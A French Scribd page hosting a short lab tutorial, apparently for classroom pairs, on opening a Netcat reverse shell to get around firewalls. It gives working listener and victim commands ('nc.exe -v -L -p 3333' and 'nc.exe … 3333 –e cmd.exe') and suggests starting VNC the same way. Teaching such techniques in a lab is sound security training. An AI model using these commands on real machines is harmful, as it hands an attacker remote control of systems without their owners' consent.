0% ont trouvé ce document utile (0 vote)
733 vues2 pages

Reverse Shell Netcat: Guide Complet

Transféré par

Mehdi Makloufi
Copyright
© Attribution Non-Commercial (BY-NC)
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
733 vues2 pages

Reverse Shell Netcat: Guide Complet

Transféré par

Mehdi Makloufi
Copyright
© Attribution Non-Commercial (BY-NC)
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Reverse Shell avec Netcat

1 - Principe
Netcat est un outil réseau souvent appelé « TCP/IP swiss army knife ».
Avec cet outil on envoie des requêtes TCP/IP et on en reçoit. C’est très simple et très puissant !
Nous allons utiliser cet outil afin de se connecter à un ordinateur distant.

Ce qui est important à comprendre ici est le fait que nous allons « forcer » l’ordinateur distant à se
connecter à notre ordinateur et non l’inverse ! D’où le « Reverse » Shell. Nous ne faisons pas une
simple backdoor, qui est plus difficile à mettre en place car les pare-feux font leur boulot !

Ici la victime va ouvrir un prompt visible sur notre machine !

Cela permet de contourner les pare-feux, et nous allons voir comment.

2 - Exploit
Par groupe de 2. Nous utiliserons uniquement Windows Server 2003.

Nous allons récupérer l’outil « Netcat » à cette adresse :

http://joncraton.org/files/nc111nt.zip

Décompresser l’archive dans C:\Windows\system32

Lancez un prompt sur les 2 machines. (Exécuter -> cmd)

Puis aller dans le répertoire que vous venez de décompresser.

PARTIE ATTAQUE

 Sur la machine qui attaque, nous allons écouter sur le port 3333 grâce à « netcat ».
 Entrer cette commande :
 nc.exe -v -L -p 3333
o –v permet d’afficher des détails en console
o –L (listen) permet d’écouter les connexions entrantes
o –p indique le port sur lequel on écoute
 Désormais, n’importe quelle machine peut se connecter sur le port 3333 de notre machine
PARTIE VICTIME

 La victime doit se connecter sur le port 3333 de la machine qui attaque


 Elle doit exécuter un shell afin d’ouvrir une session
 Ici nous allons le faire à la main pour rendre les choses plus simple.
 Pour cela entrer cette commande :
 nc.exe (ipdelautremachine) 3333 –e cmd.exe
o –e précise la commande à exécuter lorsqu’une connexion est établie
 La connexion est établie et un shell s’est ouvert sur la machine attaquante !

Screenshot de la machine qui attaque :

Vous avez désormais un shell sur la machine victime.

Nous avons ici exécuté la commande cmd.exe lors de la connexion mais on peut ouvrir d’autres
programmes ! VNC par exemple afin d’avoir le bureau à distance !

3 - Conclusion

 Le reverse shell est très puissant car il permet de contourner les pare-feux.
 La victime vient à nous et non l’inverse comme dans une simple backdoor.

Vous aimerez peut-être aussi